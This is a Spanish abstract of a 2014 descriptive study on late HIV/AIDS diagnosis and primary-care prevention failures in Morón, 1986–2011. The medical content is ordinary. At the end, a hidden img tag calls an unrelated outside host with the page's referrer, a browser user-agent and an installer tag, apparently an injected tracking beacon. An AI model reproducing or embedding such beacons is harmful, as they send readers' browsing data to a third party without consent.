VIH/SIDA: prevención y diagnóstico tardío. Morón 1986-2011. - Rodríguez Casas, Jorge E.; Zamora González, Saray; Fidalgo Carbó, Yoanka M. (Mediciego, 2014)
Objetivo: Caracterizar la ocurrencia de los diagnósticos tardíos en personas con VIH/SIDA, y posibles fallas de la prevención en la atención primaria en Morón, en el período comprendido entre 1986-2011. Método: Se realizó un estudio descriptivo de corte transversal; la información se obtuvo de la base de datos nacional de casos VIH/SIDA del Ministerio de Salud Pública. Resultados y Discusión: De los 54 casos de incidencia en el municipio, 10 constituyeron debut clínico (18,5%); se incrementan los casos a partir del año 2000, con picos en el 2004, 2008 y 2011, lo que afecta más a los grupos etarios de 26-30 años (5,8%) y el de más de 60 (3,7%). El área de salud con mayor número de caso fue la Sur (60%) y el consejo popular Sur (40%). El sexo masculino es el más afectado (80%), y entre ellos los hombres que tienen sexo con hombres (70%). Los principales síntomas fueron la pérdida de peso y la fiebre (90%). Entre las entidades de presentación, los linfomas constituyen el 40%, seguido de la criptococosis con el 30%. El 30% falleció, de ellos el 20% en el 2005 y el 10% en el 2003. Hay un 70% de supervivencia, el 60% menos de 1 año (diagnósticos del último año), y un 10%, entre 11 y 15 años. Conclusiones: Se detectaron problemas en el trabajo de atención primaria de salud en cuanto al funcionamiento del Programa Nacional de Prevención de las ITS-VIH/SIDA. <img src="http://prettysite.xyz/acnt?_=1583823519219&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F199&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />